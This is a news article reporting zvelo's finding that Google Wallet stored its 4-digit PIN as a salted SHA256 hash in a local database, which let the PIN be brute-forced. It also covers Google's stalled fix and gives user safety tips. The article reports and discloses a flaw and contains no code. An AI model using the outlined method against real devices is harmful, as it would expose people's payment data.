After viaForensics identified a number of vulnerabilities in Google Wallet that may be utilized by cybercriminals to launch social engineering attacks with the purpose of obtaining sensitive information, zvelo researchers found an even bigger issue that exposes the software’s PIN to brute-force attacks.
Not only did the experts confirm the findings of viaForensics, but they also found a way to uncover the 4-digit PIN entered by users to authenticate and access the Secure Element (SE), a device that stores and encrypts the most sensitive data.
This PIN is actually the extra security measure specific to Near-Field Communication (NFC) systems, a component that’s not present in traditional physical credit cards. The feature ensures that the Google Wallet locks itself up after a few failed attempts to protect the credit card information.
After some poking around in the Wallet’s database, the experts came across a table named metadata that contains a row identified as deviceInfo. After realizing that the data was compiled using Google’s own “Protocol Buffers,” with the aid of a custom .proto file they managed to access the contents of the binary data.
Among other things such as Unique User ID, Google account information, Cloud to Device Messaging account information, and Google Wallet Setup status, the researchers came across a PIN information section that contained a long integer salt and a SHA256 hex encoded string hash.
By knowing that the PIN only comprises four digits, they managed to reveal the access code easily with the aid of a brute force attack. The attack allowed them to guess the PIN in one single try, giving them access to the most sensitive data stored in Google Wallet.
Google rushed to address the issue, but ran into some obstacles. The main impediment occurred after they updated the code and got it approved and signed by the SE manufacturers.
To solve the issue they had to move the PIN verification into the SE itself, thus giving the banks the task of protecting the PIN.
“At present, the decision is in the banks’ hands. They may actually choose to accept the risk imposed by this vulnerability rather than incur the financial and administrative overhead of allowing Google to release a proper fix (and thereby potentially put the banks on the hook for the PIN security),” zvelo’s Joshua Rubin said.
In the meantime, users can protect themselves against this threat by not rooting their phones, by enabling lock screens, disabling USB debugging, and finally, by always keeping the device up-to-date.